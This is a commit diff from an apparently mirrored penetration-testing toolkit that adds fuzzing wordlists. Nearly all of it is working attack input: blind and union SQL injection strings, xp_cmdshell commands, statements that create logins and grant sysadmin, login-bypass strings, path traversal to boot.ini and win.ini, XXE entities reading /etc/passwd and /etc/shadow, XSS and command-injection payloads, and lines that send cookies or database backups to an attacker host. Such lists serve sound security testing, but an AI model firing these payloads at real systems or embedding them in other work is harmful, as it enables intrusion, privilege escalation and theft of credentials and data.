mirror of
https://github.com/autistic-symposium/sec-pentesting-toolkit.git
synced 2025-05-02 23:05:11 -04:00
Add some fuzzing stuff and wordlists
This commit is contained in:
parent
4261c9c087
commit
4d24e016b8
160 changed files with 7723391 additions and 527 deletions
BIN
Vulnerabilities_and_Exploits/fuzzing/.DS_Store
vendored
Normal file
BIN
Vulnerabilities_and_Exploits/fuzzing/.DS_Store
vendored
Normal file
Binary file not shown.
23
Vulnerabilities_and_Exploits/fuzzing/ASP_CommonBackdoors.fuzz.txt
Executable file
23
Vulnerabilities_and_Exploits/fuzzing/ASP_CommonBackdoors.fuzz.txt
Executable file
|
@ -0,0 +1,23 @@
|
|||
3fexe.asp
|
||||
ASpy.asp
|
||||
EFSO.asp
|
||||
RemExp.asp
|
||||
aspxSH.asp
|
||||
aspxshell.aspx
|
||||
aspydrv.asp
|
||||
cmd.asp
|
||||
cmd.aspx
|
||||
cmdexec.aspx
|
||||
elmaliseker.asp
|
||||
filesystembrowser.aspx
|
||||
fileupload.aspx
|
||||
ntdaddy.asp
|
||||
spexec.aspx
|
||||
sql.aspx
|
||||
tool.asp
|
||||
toolaspshell.asp
|
||||
up.asp
|
||||
zehir.asp
|
||||
zehir.aspx
|
||||
zehir4.asp
|
||||
zehir4.aspx
|
30
Vulnerabilities_and_Exploits/fuzzing/Extensions.Mostcommon.fuzz.txt
Executable file
30
Vulnerabilities_and_Exploits/fuzzing/Extensions.Mostcommon.fuzz.txt
Executable file
|
@ -0,0 +1,30 @@
|
|||
asp
|
||||
aspx
|
||||
php
|
||||
php3
|
||||
php4
|
||||
php5
|
||||
txt
|
||||
shtm
|
||||
shtml
|
||||
phtm
|
||||
phtml
|
||||
jhtml
|
||||
pl
|
||||
jsp
|
||||
cfm
|
||||
cfml
|
||||
py
|
||||
rb
|
||||
cfg
|
||||
zip
|
||||
pdf
|
||||
gz
|
||||
tar
|
||||
tar.gz
|
||||
tgz
|
||||
doc
|
||||
docx
|
||||
xls
|
||||
xlsx
|
||||
conf
|
42
Vulnerabilities_and_Exploits/fuzzing/FUZZDB_GenericBlind.txt
Executable file
42
Vulnerabilities_and_Exploits/fuzzing/FUZZDB_GenericBlind.txt
Executable file
|
@ -0,0 +1,42 @@
|
|||
# from wapiti
|
||||
sleep(__TIME__)#
|
||||
1 or sleep(__TIME__)#
|
||||
" or sleep(__TIME__)#
|
||||
' or sleep(__TIME__)#
|
||||
" or sleep(__TIME__)="
|
||||
' or sleep(__TIME__)='
|
||||
1) or sleep(__TIME__)#
|
||||
") or sleep(__TIME__)="
|
||||
') or sleep(__TIME__)='
|
||||
1)) or sleep(__TIME__)#
|
||||
")) or sleep(__TIME__)="
|
||||
')) or sleep(__TIME__)='
|
||||
;waitfor delay '0:0:__TIME__'--
|
||||
);waitfor delay '0:0:__TIME__'--
|
||||
';waitfor delay '0:0:__TIME__'--
|
||||
";waitfor delay '0:0:__TIME__'--
|
||||
');waitfor delay '0:0:__TIME__'--
|
||||
");waitfor delay '0:0:__TIME__'--
|
||||
));waitfor delay '0:0:__TIME__'--
|
||||
'));waitfor delay '0:0:__TIME__'--
|
||||
"));waitfor delay '0:0:__TIME__'--
|
||||
benchmark(10000000,MD5(1))#
|
||||
1 or benchmark(10000000,MD5(1))#
|
||||
" or benchmark(10000000,MD5(1))#
|
||||
' or benchmark(10000000,MD5(1))#
|
||||
1) or benchmark(10000000,MD5(1))#
|
||||
") or benchmark(10000000,MD5(1))#
|
||||
') or benchmark(10000000,MD5(1))#
|
||||
1)) or benchmark(10000000,MD5(1))#
|
||||
")) or benchmark(10000000,MD5(1))#
|
||||
')) or benchmark(10000000,MD5(1))#
|
||||
pg_sleep(__TIME__)--
|
||||
1 or pg_sleep(__TIME__)--
|
||||
" or pg_sleep(__TIME__)--
|
||||
' or pg_sleep(__TIME__)--
|
||||
1) or pg_sleep(__TIME__)--
|
||||
") or pg_sleep(__TIME__)--
|
||||
') or pg_sleep(__TIME__)--
|
||||
1)) or pg_sleep(__TIME__)--
|
||||
")) or pg_sleep(__TIME__)--
|
||||
')) or pg_sleep(__TIME__)--
|
17
Vulnerabilities_and_Exploits/fuzzing/FUZZDB_MSSQL.txt
Executable file
17
Vulnerabilities_and_Exploits/fuzzing/FUZZDB_MSSQL.txt
Executable file
|
@ -0,0 +1,17 @@
|
|||
# you will need to customize/modify some of the vaules in the queries for best effect
|
||||
'; exec master..xp_cmdshell 'ping 10.10.1.2'--
|
||||
'create user name identified by 'pass123' --
|
||||
'create user name identified by pass123 temporary tablespace temp default tablespace users;
|
||||
' ; drop table temp --
|
||||
'exec sp_addlogin 'name' , 'password' --
|
||||
' exec sp_addsrvrolemember 'name' , 'sysadmin' --
|
||||
' insert into mysql.user (user, host, password) values ('name', 'localhost', password('pass123')) --
|
||||
' grant connect to name; grant resource to name; --
|
||||
' insert into users(login, password, level) values( char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72) + char(0x70) + char(0x65) + char(0x74) + char(0x65) + char(0x72),char(0x64)
|
||||
' or 1=1 --
|
||||
' union (select @@version) --
|
||||
' union (select NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, NULL, NULL, (select @@version)) --
|
||||
' union (select NULL, NULL, NULL, NULL, NULL, (select @@version)) --
|
15
Vulnerabilities_and_Exploits/fuzzing/FUZZDB_MSSQLEnumeration.txt
Executable file
15
Vulnerabilities_and_Exploits/fuzzing/FUZZDB_MSSQLEnumeration.txt
Executable file
|
@ -0,0 +1,15 @@
|
|||
# ms-sqli info disclosure payload fuzzfile
|
||||
# replace regex with your fuzzer for best results <attackerip> <sharename>
|
||||
# run wireshark or tcpdump, look for incoming smb or icmp packets from victim
|
||||
# might need to terminate payloads with ;--
|
||||
select @@version
|
||||
select @@servernamee
|
||||
select @@microsoftversione
|
||||
select * from master..sysserverse
|
||||
select * from sysusers
|
||||
exec master..xp_cmdshell 'ipconfig+/all'
|
||||
exec master..xp_cmdshell 'net+view'
|
||||
exec master..xp_cmdshell 'net+users'
|
||||
exec master..xp_cmdshell 'ping+<attackerip>'
|
||||
BACKUP database master to disks='\\<attackerip>\<attackerip>\backupdb.dat'
|
||||
create table myfile (line varchar(8000))" bulk insert foo from 'c:\inetpub\wwwroot\auth.aspâ'" select * from myfile"--
|
6
Vulnerabilities_and_Exploits/fuzzing/FUZZDB_MYSQL.txt
Executable file
6
Vulnerabilities_and_Exploits/fuzzing/FUZZDB_MYSQL.txt
Executable file
|
@ -0,0 +1,6 @@
|
|||
1'1
|
||||
1 exec sp_ (or exec xp_)
|
||||
1 and 1=1
|
||||
1' and 1=(select count(*) from tablenames); --
|
||||
1 or 1=1
|
||||
1' or '1'='1
|
3
Vulnerabilities_and_Exploits/fuzzing/FUZZDB_MySQL_ReadLocalFiles.txt
Executable file
3
Vulnerabilities_and_Exploits/fuzzing/FUZZDB_MySQL_ReadLocalFiles.txt
Executable file
|
@ -0,0 +1,3 @@
|
|||
# mysql local file disclosure through sqli
|
||||
# fuzz interesting absolute filepath/filename into <filepath>
|
||||
create table myfile (input TEXT); load data infile '<filepath>' into table myfile; select * from myfile;
|
8
Vulnerabilities_and_Exploits/fuzzing/FUZZDB_MySQL_SQLi_LoginBypass.txt
Executable file
8
Vulnerabilities_and_Exploits/fuzzing/FUZZDB_MySQL_SQLi_LoginBypass.txt
Executable file
|
@ -0,0 +1,8 @@
|
|||
# regex replace as many as you can with your fuzzer for best results:
|
||||
# <user-fieldname> <pass-fieldname> <username>
|
||||
# also try to brute force a list of possible usernames, including possile admin acct names
|
||||
<username>' OR 1=1--
|
||||
'OR '' = ' Allows authentication without a valid username.
|
||||
<username>'--
|
||||
' union select 1, '<user-fieldname>', '<pass-fieldname>' 1--
|
||||
'OR 1=1--
|
531
Vulnerabilities_and_Exploits/fuzzing/FUZZDB_WindowsAattacks.txt
Executable file
531
Vulnerabilities_and_Exploits/fuzzing/FUZZDB_WindowsAattacks.txt
Executable file
|
@ -0,0 +1,531 @@
|
|||
# a wide sample of malicious input for windows targets
|
||||
A
|
||||
TRUE
|
||||
FALSE
|
||||
0
|
||||
00
|
||||
1
|
||||
-1
|
||||
1.0
|
||||
-1.0
|
||||
2
|
||||
-2
|
||||
-20
|
||||
65536
|
||||
268435455
|
||||
-268435455
|
||||
2147483647
|
||||
0xfffffff
|
||||
NULL
|
||||
null
|
||||
\0
|
||||
\00
|
||||
< script > < / script>
|
||||
%0a
|
||||
%00
|
||||
+%00
|
||||
\0
|
||||
\0\0
|
||||
\0\0\0
|
||||
\00
|
||||
\00\00
|
||||
\00\00\00
|
||||
$null
|
||||
$NULL
|
||||
`dir`
|
||||
\nnetstat -a%\n
|
||||
\"blah
|
||||
|dir|
|
||||
";id"
|
||||
dir%00
|
||||
dir%00|
|
||||
|dir
|
||||
|dir|
|
||||
|/bin/ls -al
|
||||
?x=
|
||||
?x="
|
||||
?x=|
|
||||
?x=>
|
||||
/boot.ini
|
||||
ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|
|
||||
../../boot.ini
|
||||
/../../../../../../../../%2A
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
|
||||
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
|
||||
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini
|
||||
../../../../../../../../conf/server.xml
|
||||
C:/inetpub/wwwroot/global.asa
|
||||
C:\inetpub\wwwroot\global.asa
|
||||
C:/boot.ini
|
||||
C:\boot.ini
|
||||
../../../../../../../../../../../../localstart.asp%00
|
||||
../../../../../../../../../../../../localstart.asp
|
||||
../../../../../../../../../../../../boot.ini%00
|
||||
../../../../../../../../../../../../boot.ini
|
||||
/./././././././././././boot.ini
|
||||
/../../../../../../../../../../../boot.ini%00
|
||||
/../../../../../../../../../../../boot.ini
|
||||
/..\../..\../..\../..\../..\../..\../boot.ini
|
||||
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini
|
||||
\..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||
..\..\..\..\..\..\..\..\..\..\boot.ini%00
|
||||
..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||
/../../../../../../../../../../../boot.ini%00.html
|
||||
/../../../../../../../../../../../boot.ini%00.jpg
|
||||
/.../.../.../.../.../
|
||||
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
|
||||
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini
|
||||
%0d%0aX-Injection-Header:%20AttackValue
|
||||
!@#0%^#0##018387@#0^^**(()
|
||||
%01%02%03%04%0a%0d%0aADSF
|
||||
/,%ENV,/
|
||||
<!--#exec%20cmd="dir"-->
|
||||
<!--#exec%20cmd="dir"-->
|
||||
%
|
||||
#
|
||||
*
|
||||
}
|
||||
;
|
||||
/
|
||||
\
|
||||
\\
|
||||
\\/
|
||||
\\\\*
|
||||
\\\\?\\
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<<
|
||||
<<<
|
||||
|
|
||||
||
|
||||
`
|
||||
-
|
||||
--
|
||||
*|
|
||||
^'
|
||||
\'
|
||||
/'
|
||||
@'
|
||||
(')
|
||||
{'}
|
||||
[']
|
||||
*'
|
||||
#'
|
||||
!'
|
||||
!@#$%%^#$%#$@#$%$$@#$%^^**(()
|
||||
%01%02%03%04%0a%0d%0aADSF
|
||||
\t
|
||||
"\t"
|
||||
|
||||
|
||||
|
||||
|
||||
#xD
|
||||
#xA
|
||||
#xD#xA
|
||||
#xA#xD
|
||||
/%00/
|
||||
%00/
|
||||
%00
|
||||
<?
|
||||
%3C
|
||||
%3C%3F
|
||||
%60
|
||||
%5C
|
||||
%5C/
|
||||
%7C
|
||||
%00
|
||||
/%2A
|
||||
%2A
|
||||
%2C
|
||||
%20
|
||||
%20|
|
||||
%250a
|
||||
%2500
|
||||
../
|
||||
%2e%2e%2f
|
||||
..%u2215
|
||||
..%c0%af
|
||||
..%bg%qf
|
||||
..\
|
||||
..%5c
|
||||
..%%35c
|
||||
..%255c
|
||||
..%%35%63
|
||||
..%25%35%63
|
||||
..%u2216
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
<
|
||||
\x3c
|
||||
\x3C
|
||||
\u003c
|
||||
\u003C
|
||||
something%00html
|
||||
'
|
||||
/'
|
||||
\'
|
||||
^'
|
||||
@'
|
||||
{'}
|
||||
[']
|
||||
*'
|
||||
#'
|
||||
">xxx<P>yyy
|
||||
"><script>"
|
||||
<script>alert("XSS")</script>
|
||||
<<script>alert("XSS");//<</script>
|
||||
<script>alert(document.cookie)</script>
|
||||
'><script>alert(document.cookie)</script>
|
||||
'><script>alert(document.cookie);</script>
|
||||
\";alert('XSS');//
|
||||
%3cscript%3ealert("XSS");%3c/script%3e
|
||||
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
|
||||
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
|
||||
<script>alert(document.cookie);</script>
|
||||
<script>alert(document.cookie);<script>alert
|
||||
<xss><script>alert('XSS')</script></vulnerable>
|
||||
<IMG%20SRC='javascript:alert(document.cookie)'>
|
||||
<IMG SRC="javascript:alert('XSS');">
|
||||
<IMG SRC="javascript:alert('XSS')"
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=JaVaScRiPt:alert('XSS')>
|
||||
<IMG SRC=javascript:alert("XSS")>
|
||||
<IMG SRC=`javascript:alert("'XSS'")`>
|
||||
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
|
||||
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
|
||||
<IMG%20SRC='javasc ript:alert(document.cookie)'>
|
||||
<IMG SRC="jav ascript:alert('XSS');">
|
||||
<IMG SRC="jav	ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="jav
ascript:alert('XSS');">
|
||||
<IMG SRC="  javascript:alert('XSS');">
|
||||
<IMG DYNSRC="javascript:alert('XSS')">
|
||||
<IMG LOWSRC="javascript:alert('XSS')">
|
||||
<IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
<IMG SRC=javascript:alert('XSS')>
|
||||
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
|
||||
"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>
|
||||
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
|
||||
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
|
||||
'';!--"<XSS>=&{()}
|
||||
|
||||
'
|
||||
"
|
||||
#
|
||||
-
|
||||
--
|
||||
' --
|
||||
--';
|
||||
' ;
|
||||
= '
|
||||
= ;
|
||||
= --
|
||||
\x23
|
||||
\x27
|
||||
\x3D \x3B'
|
||||
\x3D \x27
|
||||
\x27\x4F\x52 SELECT *
|
||||
\x27\x6F\x72 SELECT *
|
||||
'or select *
|
||||
admin'--
|
||||
';shutdown--
|
||||
<>"'%;)(&+
|
||||
' or ''='
|
||||
' or 'x'='x
|
||||
" or "x"="x
|
||||
') or ('x'='x
|
||||
0 or 1=1
|
||||
' or 0=0 --
|
||||
" or 0=0 --
|
||||
or 0=0 --
|
||||
' or 0=0 #
|
||||
" or 0=0 #
|
||||
or 0=0 #
|
||||
' or 1=1--
|
||||
" or 1=1--
|
||||
' or '1'='1'--
|
||||
"' or 1 --'"
|
||||
or 1=1--
|
||||
or%201=1
|
||||
or%201=1 --
|
||||
' or 1=1 or ''='
|
||||
" or 1=1 or ""="
|
||||
' or a=a--
|
||||
" or "a"="a
|
||||
') or ('a'='a
|
||||
") or ("a"="a
|
||||
hi" or "a"="a
|
||||
hi" or 1=1 --
|
||||
hi' or 1=1 --
|
||||
hi' or 'a'='a
|
||||
hi') or ('a'='a
|
||||
hi") or ("a"="a
|
||||
'hi' or 'x'='x';
|
||||
@variable
|
||||
,@variable
|
||||
PRINT
|
||||
PRINT @@variable
|
||||
select
|
||||
insert
|
||||
as
|
||||
or
|
||||
procedure
|
||||
limit
|
||||
order by
|
||||
asc
|
||||
desc
|
||||
delete
|
||||
update
|
||||
distinct
|
||||
having
|
||||
truncate
|
||||
replace
|
||||
like
|
||||
handler
|
||||
bfilename
|
||||
' or username like '%
|
||||
' or uname like '%
|
||||
' or userid like '%
|
||||
' or uid like '%
|
||||
' or user like '%
|
||||
exec xp
|
||||
exec sp
|
||||
'; exec master..xp_cmdshell
|
||||
'; exec xp_regread
|
||||
t'exec master..xp_cmdshell 'nslookup www.google.com'--
|
||||
--sp_password
|
||||
\x27UNION SELECT
|
||||
' UNION SELECT
|
||||
' UNION ALL SELECT
|
||||
' or (EXISTS)
|
||||
' (select top 1
|
||||
'||UTL_HTTP.REQUEST
|
||||
1;SELECT%20*
|
||||
to_timestamp_tz
|
||||
tz_offset
|
||||
<>"'%;)(&+
|
||||
'%20or%201=1
|
||||
%27%20or%201=1
|
||||
%20$(sleep%2050)
|
||||
%20'sleep%2050'
|
||||
char%4039%41%2b%40SELECT
|
||||
'%20OR
|
||||
'sqlattempt1
|
||||
(sqlattempt2)
|
||||
|
|
||||
%7C
|
||||
*|
|
||||
%2A%7C
|
||||
*(|(mail=*))
|
||||
%2A%28%7C%28mail%3D%2A%29%29
|
||||
*(|(objectclass=*))
|
||||
%2A%28%7C%28objectclass%3D%2A%29%29
|
||||
(
|
||||
%28
|
||||
)
|
||||
%29
|
||||
&
|
||||
%26
|
||||
!
|
||||
%21
|
||||
' or 1=1 or ''='
|
||||
' or ''='
|
||||
x' or 1=1 or 'x'='y
|
||||
/
|
||||
//
|
||||
//*
|
||||
*/*
|
||||
@*
|
||||
count(/child::node())
|
||||
x' or name()='username' or 'x'='y
|
||||
<name>','')); phpinfo(); exit;/*</name>
|
||||
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
|
||||
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
|
||||
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
|
||||
<xml ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>
|
||||
<xml ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></xml><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||
<xml SRC="xsstest.xml" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
|
||||
<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
|
||||
|
||||
'
|
||||
'--
|
||||
' or 1=1--
|
||||
1 or 1=1--
|
||||
' or 1 in (@@version)--
|
||||
1 or 1 in (@@version)--
|
||||
'; waitfor delay '0:30:0'--
|
||||
1; waitfor delay '0:30:0'--
|
||||
'||Utl_Http.request('http://<yourservername>') from dual--
|
||||
1||Utl_Http.request('http://<yourservername>') from dual--
|
||||
xsstest
|
||||
xsstest%00"<>'
|
||||
</foo>
|
||||
<foo></foo>
|
||||
))))))))))
|
||||
../../../../../../../../../../boot.ini
|
||||
..\..\..\..\..\..\..\..\..\..\boot.ini
|
||||
../../../../../../../../../../windows/win.ini
|
||||
..\..\..\..\..\..\..\..\..\..\windows\win.ini
|
||||
|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 &
|
||||
| ping -i 30 127.0.0.1 |
|
||||
| ping -n 30 127.0.0.1 |
|
||||
& ping -i 30 127.0.0.1 &
|
||||
& ping -n 30 127.0.0.1 &
|
||||
; ping 127.0.0.1 ;
|
||||
%0a ping -i 30 127.0.0.1 %0a
|
||||
`ping 127.0.0.1`
|
||||
;echo 111111
|
||||
echo 111111
|
||||
response.write 111111
|
||||
:response.write 111111
|
||||
http://<yourservername>/
|
||||
<youremail>%0aCc:<youremail>
|
||||
<youremail>%0d%0aCc:<youremail>
|
||||
<youremail>%0aBcc:<youremail>
|
||||
<youremail>%0d%0aBcc:<youremail>
|
||||
%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a
|
||||
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
|
||||
# known cross platform source Code, file disclosure attack patterns - append after file or dir path
|
||||
%70
|
||||
.%E2%73%70
|
||||
%2e0
|
||||
%2e
|
||||
.
|
||||
\
|
||||
?*
|
||||
%20
|
||||
%00
|
||||
%2f
|
||||
%5c
|
||||
count(/child::node())
|
||||
x' or name()='username' or 'x'='y
|
||||
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
|
||||
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file://c:/boot.ini"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/shadow"">]><foo>&xxe;</foo>"
|
||||
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
|
||||
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
|
||||
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
|
||||
"<xml SRC=""xsstest.xml"" ID=I></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
|
||||
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
|
||||
%00
|
||||
NULL
|
||||
null
|
||||
'
|
||||
"
|
||||
;
|
||||
<!
|
||||
-
|
||||
=
|
||||
+
|
||||
"
|
||||
&
|
||||
!
|
||||
|
|
||||
<
|
||||
>
|
||||
"><script>alert(1)</script>
|
||||
%0d
|
||||
%0a
|
||||
%7f
|
||||
%ff
|
||||
-1
|
||||
other
|
||||
%s%p%x%d
|
||||
%99999999999s
|
||||
%08x
|
||||
%20d
|
||||
%20n
|
||||
%20x
|
||||
%20s
|
||||
%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
|
||||
%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
|
||||
%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
|
||||
%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
|
||||
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
|
||||
%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
|
||||
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
|
||||
%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
|
||||
%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
|
||||
%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
|
||||
%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
|
||||
%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
|
||||
%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
|
||||
%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
|
||||
